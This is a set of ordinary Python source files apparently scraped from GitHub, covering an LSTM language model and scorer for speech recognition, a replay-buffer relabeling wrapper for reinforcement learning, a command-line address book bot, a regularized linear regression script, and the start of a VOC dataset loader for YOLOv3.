self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTM = torch.nn.LSTM(embedding_dim, hidden_dim, num_layers=n_layers, batch_first=True, \n dropout=dropout_rate if n_layers > 1 else 0)\n\n # re-init\n weight_init(self.LSTM)\n\n self.output_layer = torch.nn.Linear(hidden_dim, output_dim)\n self.dropout_layer = torch.nn.Dropout(p=dropout_rate)\n\n self.hidden_dim = hidden_dim\n self.output_dim = output_dim\n self.dropout_rate = dropout_rate\n self.n_layers = n_layers\n\n # label smoothing hyperparameters\n self.ls_weight = ls_weight\n self.labeldist = labeldist\n if labeldist is not None:\n self.vlabeldist = cc(torch.from_numpy(np.array(labeldist, dtype=np.float32)))\n\n def zero_state(self, ref, dim=None):\n if not dim:\n return ref.new_zeros(self.n_layers, ref.size(0), self.hidden_dim)\n else:\n return ref.new_zeros(self.n_layers, ref.size(0), dim)\n\n def forward(self, ys=None, discrete_input=True):\n bos = ys[0].data.new([self.bos])\n eos = ys[0].data.new([self.eos])\n if discrete_input:\n ys_in = [torch.cat([bos, y, eos, eos, eos, eos], dim=0) for y in ys]\n ys_out = [torch.cat([y, eos, eos, eos, eos, eos], dim=0) for y in ys]\n pad_ys_in = pad_sequence(ys_in, batch_first=True, padding_value=self.eos) \n pad_ys_out = pad_sequence(ys_out, batch_first=True, padding_value=self.eos)\n # for generate output\n else:\n # add at the beginning, and drop last as input\n bos_seq = ys.new_zeros(ys.size(0), 1) + bos\n pad_ys_in = torch.cat([bos_seq, ys[:, :-1]], dim=1)\n pad_ys_out = ys\n\n # get length info\n batch_size, olength = pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n eys = self.dropout_layer(eys)\n # using pack to speedup\n if discrete_input:\n ilens = [y.size(0) for y in ys_in]\n packed_eys = pack_padded_sequence(eys, ilens, batch_first=True)\n output, (_, _) = self.LSTM(packed_eys)\n output, _ = pad_packed_sequence(output, batch_first=True)\n else:\n output, (_, _) = self.LSTM(eys)\n\n output = self.dropout_layer(output).squeeze(1)\n logits = self.output_layer(output)\n log_probs = F.log_softmax(logits, dim=2)\n probs = F.softmax(logits, dim=2)\n ys_log_probs = torch.gather(log_probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n ys_probs = torch.gather(probs, dim=2, index=pad_ys_out.unsqueeze(2)).squeeze(2)\n # label smoothing\n if self.ls_weight > 0 and self.training:\n loss_reg = torch.sum(log_probs * self.vlabeldist, dim=2)\n ys_log_probs = (1 - self.ls_weight) * ys_log_probs + self.ls_weight * loss_reg\n predictions = torch.argmax(logits, dim=-1)\n return ys_log_probs, ys_probs, predictions\n\n # only use in decode stage\n def forward_step(self, emb, dec_z=None, dec_c=None):\n if dec_z is not None:\n output, (dec_z, dec_c) = self.LSTM(emb, (dec_z, dec_c))\n else:\n output, (dec_z, dec_c) = self.LSTM(emb)\n output.squeeze_(1)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c\n\n def decode(self, n_samples=5, sample=False, max_dec_timesteps=500):\n logits, predictions = [], []\n dec_c, dec_z = None, None\n for t in range(max_dec_timesteps):\n if t == 0:\n bos = cc(torch.Tensor([self.bos for _ in range(n_samples)]).type(torch.LongTensor))\n emb = self.embedding(bos).unsqueeze(1)\n else:\n emb = self.embedding(predictions[-1]).unsqueeze(1)\n logit, dec_z, dec_c = self.forward_step(emb, dec_z, dec_c)\n logits.append(logit)\n if not sample:\n predictions.append(torch.argmax(logit, dim=-1))\n else:\n sampled_indices = Categorical(logits=logit).sample() \n predictions.append(sampled_indices)\n\n logits = torch.stack(logits, dim=1)\n predictions = torch.stack(predictions, dim=1)\n return predictions\n\n def mask_and_cal_sum(self, log_probs, ys, mask=None):\n if mask is None: \n seq_len = [y.size(0) + 1 + 4 for y in ys]\n mask = cc(_seq_mask(seq_len=seq_len, max_len=log_probs.size(1)))\n else:\n seq_len = [y.size(0) for y in ys]\n # divide by total length\n loss = torch.sum(log_probs * mask) / sum(seq_len)\n return loss\n\n'''\nclass AELScorer(torch.nn.Module):\n def __init__(self, decoder, attention, \n output_dim, embedding_dim, hidden_dim, att_odim, dropout_rate, \n eos, pad):\n super(AELScorer, self).__init__()\n self.eos, self.pad = eos, pad\n\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n # load decoder weight\n self.embedding.load_state_dict(decoder.embedding.state_dict())\n self.embedding.requires_grad = False\n self.LSTMCell.load_state_dict(decoder.LSTMCell.state_dict())\n\n self.output_layer = torch.nn.Linear(hidden_dim, 1)\n self.attention = attention\n self.attention.requires_grad = False\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = F.dropout(cell_inp, self.dropout_rate, training=self.training)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n # no concatenate on cell_output and context vector\n #output = torch.cat([dec_z, c], dim=-1)\n output = F.dropout(dec_z, self.dropout_rate)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys, is_distr=False):\n batch_size = enc_pad.size(0)\n\n if not is_distr:\n # prepare sequences\n pad_ys_in = pad_list(ys, pad_value=self.eos)\n\n # get length info\n batch_size, olength = pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n else:\n # if is_distr (batch_size, length, vocab_size), multiply the distr to embedding weight\n eys = ys @ self.embedding.weight\n olength = ys.size(1)\n\n # initialization\n dec_c = self.zero_state(enc_pad)\n dec_z = self.zero_state(enc_pad)\n c = self.zero_state(enc_pad, dim=self.att_odim)\n\n w = None\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # loop for each timestep\n for t in range(olength):\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(eys[:, t, :], dec_z, dec_c, c, w, enc_pad, enc_len)\n ws.append(w)\n\n probs = torch.sigmoid(logit.squeeze(-1))\n cell_outputs = dec_z\n return probs, cell_outputs, ws\n\nclass Scorer(torch.nn.Module):\n def __init__(self, decoder, attention, \n output_dim, embedding_dim, hidden_dim, att_odim, dropout_rate, \n eos, pad):\n super(Scorer, self).__init__()\n\n self.eos, self.pad = eos, pad\n self.embedding = torch.nn.Embedding(output_dim, embedding_dim, padding_idx=pad)\n self.LSTMCell = torch.nn.LSTMCell(embedding_dim + att_odim, hidden_dim)\n # load decoder weight\n self.embedding.load_state_dict(decoder.embedding.state_dict())\n self.LSTMCell.load_state_dict(decoder.LSTMCell.state_dict())\n\n self.output_layer = torch.nn.Linear(hidden_dim + att_odim, 1)\n self.attention = attention\n\n self.hidden_dim = hidden_dim\n self.att_odim = att_odim\n self.dropout_rate = dropout_rate\n\n def zero_state(self, enc_pad, dim=None):\n if not dim:\n return enc_pad.new_zeros(enc_pad.size(0), self.hidden_dim)\n else:\n return enc_pad.new_zeros(enc_pad.size(0), dim)\n\n def forward_step(self, emb, dec_z, dec_c, c, w, enc_pad, enc_len):\n cell_inp = torch.cat([emb, c], dim=-1)\n cell_inp = F.dropout(cell_inp, self.dropout_rate, training=self.training)\n dec_z, dec_c = self.LSTMCell(cell_inp, (dec_z, dec_c))\n\n # run attention module\n c, w = self.attention(enc_pad, enc_len, dec_z, w)\n output = torch.cat([dec_z, c], dim=-1)\n output = F.dropout(output, self.dropout_rate, training=self.training)\n logit = self.output_layer(output)\n return logit, dec_z, dec_c, c, w\n\n def forward(self, enc_pad, enc_len, ys):\n batch_size = enc_pad.size(0)\n\n # prepare sequences\n #eos = ys[0].data.new([self.eos])\n #ys_in = [torch.cat([y, eos], dim=0) for y in ys]\n pad_ys_in = pad_list(ys, pad_value=self.eos)\n\n # get length info\n batch_size, olength = pad_ys_in.size(0), pad_ys_in.size(1)\n # map idx to embedding\n eys = self.embedding(pad_ys_in)\n\n # initialization\n dec_c = self.zero_state(enc_pad)\n dec_z = self.zero_state(enc_pad)\n c = self.zero_state(enc_pad, dim=self.att_odim)\n\n w = None\n logits, prediction, ws = [], [], []\n # reset the attention module\n self.attention.reset()\n\n # loop for each timestep\n for t in range(olength):\n logit, dec_z, dec_c, c, w = \\\n self.forward_step(eys[:, t, :], dec_z, dec_c, c, w, enc_pad, enc_len)\n\n ws.append(w)\n logits.append(logit)\n\n logits = torch.stack(logits, dim=1).squeeze(dim=2)\n probs = torch.sigmoid(logits)\n ws = torch.stack(ws, dim=1)\n\n return probs, ws\n\nclass Judge(torch.nn.Module):\n def __init__(self, encoder, attention, decoder, \n input_dim, enc_hidden_dim, enc_n_layers, subsample, dropout_rate, \n dec_hidden_dim, att_dim, conv_channels, conv_kernel_size, att_odim, \n embedding_dim, output_dim, \n pad=0, eos=2, shared=True):\n\n super(Judge, self).__init__()\n self.shared = shared\n # share the parameters of encoder\n if shared:\n self.encoder = encoder\n else:\n self.encoder = Encoder(input_dim=input_dim, hidden_dim=enc_hidden_dim,\n n_layers=enc_n_layers, subsample=subsample, dropout_rate=dropout_rate)\n self.encoder.load_state_dict(encoder.state_dict())\n\n self.attention = AttLoc(encoder_dim=enc_hidden_dim, \n decoder_dim=dec_hidden_dim, att_dim=att_dim, \n conv_channels=conv_channels, conv_kernel_size=conv_kernel_size, \n att_odim=att_odim)\n self.attention.load_state_dict(attention.state_dict())\n\n self.scorer = AELScorer(decoder, self.attention, \n output_dim=output_dim, embedding_dim=embedding_dim, \n hidden_dim=dec_hidden_dim, att_odim=att_odim, dropout_rate=dropout_rate, \n eos=eos, pad=pad)\n\n def forward(self, data, ilens, ys, is_distr=False):\n if self.shared:\n with torch.no_grad():\n enc_h, enc_lens = self.encoder(data, ilens)\n else:\n enc_h, enc_lens = self.encoder(data, ilens)\n probs, cell_out, ws = self.scorer(enc_h, enc_lens, ys, is_distr=is_distr)\n return probs, cell_out, ws\n\n #def mask_and_average(self, probs, ys):\n # seq_len = [y.size(0) for y in ys]\n # mask = cc(_seq_mask(seq_len=seq_len, max_len=probs.size(1)))\n # masked_probs = probs * mask\n # # divide by total length\n # avg_probs = torch.sum(masked_probs, dim=1) / (torch.sum(mask, dim=1) + 1e-10)\n # return avg_probs, masked_probs, mask\n\n #def mask_and_cal_loss(self, avg_probs, target):\n # avg_probs = self.mask(probs, ys)\n # loss = F.binary_cross_entropy(avg_probs, target)\n # return loss, avg_probs\n'''\n\nif __name__ == '__main__':\n # just for debugging\n def get_data(root_dir='/storage/feature/LibriSpeech/npy_files/train-clean-100/7402/90848', text_index_path='/storage/feature/LibriSpeech/text_bpe/train-clean-100/7402/7402-90848.label.txt'):\n prefix = '7402-90848'\n datas = []\n for i in range(8):\n seg_id = str(i).zfill(4)\n filename = f'{prefix}-{seg_id}.npy'\n path = os.path.join(root_dir, filename)\n data = torch.from_numpy(np.load(path)).type(torch.FloatTensor)\n datas.append(data)\n datas.sort(key=lambda x: x.size(0), reverse=True)\n ilens = np.array([data.size(0) for data in datas], dtype=np.int64)\n datas = pad_sequence(datas, batch_first=True, padding_value=0)\n\n ys = []\n with open(text_index_path, 'r') as f:\n for line in f:\n utt_id, indexes = line.strip().split(',', maxsplit=1)\n indexes = cc(torch.Tensor([int(index) + 3 for index in indexes.split()]).type(torch.LongTensor))\n ys.append(indexes)\n return datas, ilens, ys[:8]\n data, ilens, ys = get_data()\n data = cc(data)\n model = cc(E2E(input_dim=40, enc_hidden_dim=800, enc_n_layers=3, \n subsample=[1, 2, 1], dropout_rate=0.3, \n dec_hidden_dim=1024, att_dim=512, conv_channels=10, \n conv_kernel_size=201, att_odim=800, output_dim=500))\n log_probs, prediction, ws = model(data, ilens, ys)\n p_lens = [p.size() for p in prediction]\n t_lens = [t.size() for t in ys]\n\n","repo_name":"jjery2243542/semi-supervised-ASR","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":34061,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"40271635710","text":"from dsb.dependencies import *\nfrom dsb.buffers.utils import get_timestep_of, sample_pos_pair_indices\nfrom dsb.utils import torchify\n\nfrom ..sample_buffer_wrapper import SampleBufferWrapper\n\n\nclass OnlineRPLBufferWrapper(SampleBufferWrapper):\n def __init__(\n self,\n buffer,\n # see appendix A of https://arxiv.org/abs/1910.11956\n window_low=30,\n window_high=260,\n high_action_same_as_low_goal=False,\n substitute_tensor=False, # set True w/ demonstrations replay buffe\n **kwargs,\n ):\n super().__init__(buffer, **kwargs)\n self.window_low = window_low\n self.window_high = window_high\n self.high_action_same_as_low_goal = high_action_same_as_low_goal\n self.substitute_tensor = substitute_tensor\n\n def get_batch(self, batch_it, ptrs):\n ptrs, batch = self.buffer.get_batch(batch_it, ptrs)\n state, action, next_state, reward, done = batch\n\n # see Algorithm 2 and 3 of https://arxiv.org/abs/1910.11956\n # we implement relay data relabeling in an online fashion\n\n # and the low goal as state['low_desired_goal']\n # setting the high goal as state['desired_goal']\n # setting the high action as state['high_action']\n\n low_goal_all_selected_episode_ptrs = []\n high_goal_all_selected_episode_ptrs = []\n high_action_all_selected_episode_ptrs = []\n\n start_ptrs = self.start_ptr[ptrs]\n for s in np.unique(start_ptrs):\n # NOTE: using [:] to get numpy array from ShmemNumpyArray\n episode_ptrs = np.array(self.episode_ptrs[s][:])\n N = len(episode_ptrs)\n if N == 1:\n continue # if t=[0] and N=1, then no future transitions\n\n # gets timestep of ptr in episode transitions\n y = ptrs[start_ptrs == s]\n t = get_timestep_of(y, episode_ptrs)\n\n # if finding pair for last transition, then it will be paired with itself\n low_goal_selected_t = sample_pos_pair_indices(t, N, 1, self.window_low)\n low_goal_selected_episode_ptr = episode_ptrs[low_goal_selected_t]\n low_goal_all_selected_episode_ptrs.append(low_goal_selected_episode_ptr)\n\n # if finding pair for last transition, then it will be paired with itself\n high_goal_selected_t = sample_pos_pair_indices(t, N, 1, self.window_high)\n high_goal_selected_episode_ptr = episode_ptrs[high_goal_selected_t]\n high_goal_all_selected_episode_ptrs.append(high_goal_selected_episode_ptr)\n\n if self.high_action_same_as_low_goal:\n pass # dealt with later\n else:\n # if finding pair for last transition, then it will be paired with itself\n high_action_selected_t = sample_pos_pair_indices(t, N, 1, self.window_low)\n high_action_selected_episode_ptr = episode_ptrs[high_action_selected_t]\n high_action_all_selected_episode_ptrs.append(high_action_selected_episode_ptr)\n\n low_goal_selected_episode_ptr = np.concatenate(low_goal_all_selected_episode_ptrs)\n high_goal_selected_episode_ptr = np.concatenate(high_goal_all_selected_episode_ptrs)\n if self.high_action_same_as_low_goal:\n high_action_selected_episode_ptr = None\n else:\n high_action_selected_episode_ptr = np.concatenate(high_action_all_selected_episode_ptrs)\n\n batch = self.substitute_goal(\n batch,\n low_goal_selected_episode_ptr,\n high_goal_selected_episode_ptr,\n high_action_selected_episode_ptr,\n )\n return ptrs, batch\n\n def substitute_goal(\n self, batch, low_goal_relabel_ptrs, high_goal_relabel_ptrs, high_action_relabel_ptrs\n ):\n state, action, next_state, reward, done = batch\n\n # TODO: should we be getting next_state instead as goal?\n _low_goal = self.buffer.get_state(low_goal_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n low_goal = torchify(_low_goal, dtype=None, device='cpu')\n else:\n low_goal = _low_goal\n state['low_desired_goal'] = low_goal\n next_state['low_desired_goal'] = low_goal\n\n high_goal = self.buffer.get_state(high_goal_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n low_goal = torchify(low_goal, dtype=None, device='cpu')\n state['desired_goal'] = high_goal\n next_state['desired_goal'] = high_goal\n\n if self.high_action_same_as_low_goal:\n if self.substitute_tensor:\n high_action = torchify(_low_goal.copy(), dtype=None, device='cpu')\n else:\n high_action = low_goal.copy()\n else:\n high_action = self.buffer.get_state(high_action_relabel_ptrs, 'achieved_goal').copy()\n if self.substitute_tensor:\n high_action = torchify(high_action, dtype=None, device='cpu')\n state['high_action'] = high_action\n\n batch = (state, action, next_state, reward, done)\n return batch\n","repo_name":"etaoxing/domain-shift-benchmark","sub_path":"dsb/buffers/buffer_wrapper/episodic/online_rpl_buffer_wrapper.py","file_name":"online_rpl_buffer_wrapper.py","file_ext":"py","file_size_in_byte":5117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"22106609048","text":"from collections import UserDict\nfrom datetime import datetime, date, timedelta\n\n\ndef input_error(handler_func):\n def wrapper(*args, **kwargs):\n try:\n return handler_func(*args, **kwargs)\n except KeyError:\n print('Enter user name')\n except ValueError:\n print('Give me name and phone please')\n except IndexError:\n print('Invalid input, please try again')\n return wrapper\n\n\nclass AddressBook(UserDict):\n def __init__(self):\n super().__init__()\n self.current_page = 1\n self.page_size = 5\n\n def add_record(self, record):\n self.data[record.name.value] = record\n\n def iterator(self):\n total_records = len(self.data)\n total_pages = (total_records - 1) // self.page_size + 1\n start_index = (self.current_page - 1) * self.page_size\n end_index = self.current_page * self.page_size\n records = list(self.data.values())[start_index:end_index]\n for record in records:\n yield record\n\n print(f\"Page {self.current_page} of {total_pages}\")\n print(f\"Total records: {total_records}\")\n print()\n\n def next_page(self):\n total_pages = (len(self.data) - 1) // self.page_size + 1\n if self.current_page < total_pages:\n self.current_page += 1\n self.show_current_page()\n else:\n print(\"No more pages available\")\n\n def previous_page(self):\n if self.current_page > 1:\n self.current_page -= 1\n self.show_current_page()\n else:\n print(\"Already at the first page\")\n\n def show_current_page(self):\n print(f\"--- Page {self.current_page} ---\")\n for record in self.iterator():\n print(record)\n print()\n\n print(f\"--- Page {self.current_page} ---\")\n print()\n\n def show_all(self):\n print(\"All records:\")\n for record in self.data.values():\n print(record)\n print()\n\n\nclass Record:\n def __init__(self, name, phone, birthday=None):\n self.name = Name(name)\n self.phones = []\n self.add_phone(phone)\n self.birthday = None\n if birthday:\n self.birthday = Birthday(birthday)\n\n def add_birthday(self, birthday):\n if self.birthday:\n print('Contact already has a birthday')\n else:\n self.birthday = Birthday(birthday)\n print('Birthday added for contact', self.name.value)\n\n @input_error\n def add_phone(self, phone):\n self.phones.append(Phone(phone))\n\n def remove_phone(self, phone):\n self.phones = [p for p in self.phones if p.value != phone]\n\n @input_error\n def change_phone(self, new_phone):\n for phone in self.phones:\n phone.value = new_phone\n\n def days_to_birthday(self, birthday):\n today = date.today()\n birthday = datetime.strptime(birthday, \"%d.%m.%Y\").date()\n\n next_birthday = date(today.year, birthday.month, birthday.day)\n\n if next_birthday < today:\n next_birthday = date(today.year + 1, birthday.month, birthday.day)\n\n days_left = (next_birthday - today).days\n return days_left\n\n def show_phones(self):\n return [phone.value for phone in self.phones]\n\n\nclass Field:\n def __init__(self, value):\n self.value = value\n\n\nclass Name(Field):\n pass\n\n\nclass Phone(Field):\n def __init__(self, value):\n super().__init__(None)\n self.value = self.validate(value)\n\n @staticmethod\n def validate(value):\n if not value.startswith(\"+\"):\n raise ValueError(\n \"Invalid phone number format. Phone number must start with '+'\")\n return value\n\n\nclass Birthday(Field):\n def __init__(self, value):\n super().__init__(None)\n self.value = self.validate(value)\n\n @staticmethod\n def validate(value):\n try:\n date_format = \"%d-%m-%Y\"\n parsed_date = datetime.strptime(value, date_format)\n return parsed_date.date()\n except ValueError:\n raise ValueError(\n \"Invalid birthday format. Birthday must be in the format 'DD-MM-YYYY'\")\n\n\ndef main():\n address_book = AddressBook()\n print(\"Bot started, please enter your command\")\n while True:\n command = input(\"Enter command:>>>\")\n if command == 'hello':\n print('How can I help you?')\n elif command.startswith('add'):\n _, name, phone, *birthday = command.split(' ')\n if name not in address_book.data:\n record = Record(name, phone, birthday[0] if birthday else None)\n address_book.add_record(record)\n print('Contact added: {} - {}'.format(name, phone))\n else:\n print('Contact already exists')\n elif command.startswith('change'):\n _, name, new_phone = command.split(' ')\n if name in address_book.data:\n record = address_book.data[name]\n record.change_phone(new_phone)\n print('Phone changed to {} for contact {}'.format(new_phone, name))\n else:\n print('Contact not found')\n elif command == 'show all':\n for name, record in address_book.data.items():\n print('Name: {}'.format(name))\n print('Phones: {}'.format(', '.join(record.show_phones())))\n print()\n elif command.startswith('phone'):\n _, name = command.split()\n if name in address_book.data:\n record = address_book.data[name]\n print('Phone number for {}: {}'.format(\n name, ', '.join(record.show_phones())))\n else:\n print(\"Contact not found\")\n elif command == 'next':\n address_book.next_page()\n elif command == 'prev':\n address_book.previous_page()\n elif command.startswith('birth_add'):\n _, name, birthday = command.split(' ')\n if name in address_book.data:\n record = Record(name, birthday)\n address_book.add_record(record)\n print(\"date of birth added to {} and is {}\".format(name, birthday))\n elif command == 'good bye' or command == 'close' or command == 'exit':\n print('Bye')\n break\n else:\n print('Unknown command. Please try again.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"igorgroni/GOIT_HM","sub_path":"HM_11/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6591353479","text":"import os\nfrom re import match\n\n\ndef find_all_python_files(input_path: str) -> list[str]:\n python_files = []\n for dirpath, _dirnames, filenames in os.walk(input_path):\n for filename in filenames:\n if match(r\".*\\.py$\", filename):\n python_files.append(os.path.join(dirpath, filename))\n \n return python_files\n\n\ndef get_source_code_from_file(input_file: str) -> str:\n content = \"\"\n with open(input_file, \"r\") as md_file:\n content = md_file.read()\n return content\n\n\ndef get_import_name_from_path(input_path: str, input_file: str) -> str:\n return (\n input_file\n .replace(input_path, \"\")\n .replace(\".py\", \"\")\n .replace(\".\", \"\")\n .replace(os.sep, \".\")\n .replace(\".__init__\", \"\")\n .replace(\"__init__\", \".\")\n )\n","repo_name":"Michael-Reel/pyremaid","sub_path":"src/pyremaid/files/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"74981677858","text":"'''\r\n----------------------------------------------------------------------------------\r\nlinear regression python code using pandas and numpy library with regularization\r\nwith only two feature that is x1 and x2\r\noutput is y\r\nhypothesis function(predicted/model function) is h\r\nparameters/coeffcients theta0,theta1,theta2\r\nregularizatiion parameter LAMBDA\r\n-------------------------prepared by Devaraj Nadiger------------------------------\r\n'''\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nLEARNING_RATE=0.000001\r\nITERATIONS=100\r\nLAMBDA=100\r\n\r\n#hypothesis function\r\ndef hyp(X,theta):\r\n hyp=theta.T.dot(X)\r\n return hyp\r\n#regularization term to add in cost function\r\ndef reg2(theta,m,g,l):\r\n theta=theta[1:]\r\n r=((np.sum((theta)**2))*l)/(2*m)\r\n return r\r\n#regularization term to add in gradient function\r\ndef reg(theta,m,g,l,a):\r\n theta=theta[1:]\r\n o=(np.sum(theta))*(l)/m\r\n return o\r\n\r\n#cost function\r\ndef cost_fun(X,Y,theta,m,g,l):\r\n j=np.sum((hyp(X,theta)-Y)**2)/(2*m)\r\n j=j+reg2(theta,m,g,l)\r\n return j\r\n\r\n#gradient descent algorithm\r\ndef grad_des(X,Y,theta,a,itrns,m,theta_len,L):\r\n count=[0]*itrns\r\n d=[0]*itrns\r\n for i in range(itrns):\r\n h=hyp(X,theta)\r\n grad=X.dot(h-Y)/m\r\n #storing theta1 value to draw graph\r\n d[i]=theta[1]\r\n cost=cost_fun(X,Y,theta,m,theta_len,L)\r\n theta=theta-a*grad\r\n \r\n #calling regularization function and substarcting it from theta1 and theta2\r\n z=reg(theta,m,theta_len,L,a)\r\n theta[1]=theta[1]-z\r\n theta[2]=theta[2]-z\r\n \r\n count[i]=cost\r\n return theta,count,d\r\n\r\n#main function\r\ndef main():\r\n data=pd.read_csv('channing.csv') #reading csv file\r\n x1=data[\"entry\"].values\r\n x1=(x1-np.mean(x1))/(max(x1)-min(x1))\r\n x1d=x1\r\n x2=data[\"exit\"].values\r\n x2d=x2\r\n x2=(x2-np.mean(x2))/(max(x2)-min(x2))\r\n y=data[\"time\"].values \r\n m=len(x1)\r\n x0=np.ones(m)\r\n X=np.array([x0,x1,x2])\r\n Y=np.array(y)\r\n theta=np.array([1,1,1])\r\n theta_len=len(theta)\r\n a=LEARNING_RATE\r\n itrns=ITERATIONS\r\n L=LAMBDA\r\n j=list(range(0,itrns,1))\r\n \r\n H=hyp(X,theta)\r\n \r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(x1d, x2d, y, c='r')\r\n ax.scatter(x1d, x2d, H, c='b')\r\n ax.set_xlabel('x1 feature')\r\n ax.set_ylabel('x2 feature')\r\n ax.set_zlabel('initial predicted(blue) vs actual(red) output')\r\n plt.show()\r\n\r\n new_theta,count,d=grad_des(X,Y,theta,a,itrns,m,theta_len,L)\r\n\r\n \r\n print('cost_function=',count)\r\n print('\\n')\r\n \r\n plt.scatter(d,count,color='red')\r\n plt.plot(d,count)\r\n plt.xlabel('parameter')\r\n plt.ylabel('cost_function')\r\n plt.title('cost function curve ')\r\n plt.show()\r\n\r\n plt.scatter(j,d,color='red')\r\n plt.plot(j,d)\r\n plt.xlabel('iteration')\r\n plt.ylabel('parameter')\r\n plt.title('parameter vs iteration ')\r\n plt.show()\r\n \r\n plt.scatter(j,count,color='red')\r\n plt.plot(j,count)\r\n plt.xlabel('iterations')\r\n plt.ylabel('cost_function')\r\n plt.title('cost function curve ')\r\n plt.show()\r\n \r\n print('final_theta=',new_theta)\r\n \r\n pr=hyp(X,new_theta) \r\n \r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n ax.scatter(x1d, x2d, y, c='r')\r\n ax.scatter(x1d, x2d, pr, c='b')\r\n ax.set_xlabel('x1 feature')\r\n ax.set_ylabel('x2 feature')\r\n ax.set_zlabel('predicted(blue) vs actual(red) output')\r\n plt.show()\r\n \r\nif __name__==\"__main__\":\r\n main()\r\n\r\n","repo_name":"devarajnadiger/LinearRegression","sub_path":"linear_regression_regu.py","file_name":"linear_regression_regu.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17970357366","text":"import torch\nimport torch.utils.data\nimport torchvision.transforms\nimport PIL.Image, PIL.ImageDraw, PIL.ImageFont\nimport os\nimport xml.dom.minidom\nimport math\nimport random\nimport numpy as np\n\nimport YOLOv3_DataAugmentations\n\nclass VOCDataset(torch.utils.data.Dataset):\n VOCClassDict_name2num = {\n \"aeroplane\": 0, \"bicycle\": 1, \"bird\": 2, \"boat\": 3, \"bottle\": 4,\n \"bus\": 5, \"car\": 6, \"cat\": 7, \"chair\": 8, \"cow\": 9,\n \"diningtable\": 10, \"dog\": 11, \"horse\": 12, \"motorbike\": 13, \"person\": 14,\n \"pottedplant\": 15, \"sheep\": 16, \"sofa\": 17, \"train\": 18, \"tvmonitor\": 19\n }\n\n VOCClassDict_num2name = {\n 0: \"aeroplane\", 1: \"bicycle\", 2: \"bird\", 3: \"boat\", 4: \"bottle\",\n 5: \"bus\", 6: \"car\", 7: \"cat\", 8: \"chair\", 9: \"cow\",\n 10: \"diningtable\", 11: \"dog\", 12: \"horse\", 13: \"motorbike\", 14: \"person\",\n 15: \"pottedplant\", 16: \"sheep\", 17: \"sofa\", 18: \"train\", 19: \"tvmonitor\"\n }\n\n anchorBox = (\n ((116 / 416, 90 / 416), (156 / 416, 198 / 416), (373 / 416, 326 / 416)), # mapA, 归一化后的W x H;\n ((30 / 416, 61 / 416), (62 / 416, 45 / 416), (59 / 416, 119 / 416)), # mapB, 归一化后的W x H\n ((10 / 416, 13 / 416), (16 / 416, 30 / 416), (33 / 416, 23 / 416)) # mapC, 归一化后的W x H\n ) #在图片大小为416x416时,mapA为13x13,mapB为26x26,mapC为52x52\n\n def __init__(self, path, yoloImageSize = 416, useDataAugmentation = True):\n super().__init__()\n datasetPath = path\n if datasetPath[-1] != \"/\":\n datasetPath = datasetPath + \"/\"\n\n devkitPath = \"{}VOCdevkit/\".format(datasetPath)\n year = int(os.listdir(devkitPath)[0][3:])\n\n self.imgFolderPath = \"{}VOCdevkit/VOC{}/JPEGImages/\".format(datasetPath, year)\n self.imgFileExtension = \".jpg\"\n self.antFolderPath = \"{}VOCdevkit/VOC{}/Annotations/\".format(datasetPath, year)\n self.antFileExtension = \".xml\"\n\n self.fileNameList = []\n imgFileList = os.listdir(self.imgFolderPath)\n for i in imgFileList:\n if os.path.isfile(\"{}{}\".format(self.imgFolderPath, i)):\n self.fileNameList.append(i[0:-4])\n\n self.yoloImageSize = yoloImageSize\n self.useDataAugmentation = useDataAugmentation\n\n self.transform = torchvision.transforms.Compose([\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\n ])\n\n print(\"Loading VOC{} Dataset for YOLO v3.\".format(year))\n print(\"This Dataset Contains {} Images and Annotations.\".format(len(self.fileNameList)))\n print(\"\")\n\n def __getitem__(self, index):\n imgFilePath = \"{}{}{}\".format(self.imgFolderPath, self.fileNameList[index], self.imgFileExtension)\n antFilePath = \"{}{}{}\".format(self.antFolderPath, self.fileNameList[index], self.antFileExtension)\n\n #原始图片\n originalImage = PIL.Image.open(imgFilePath) 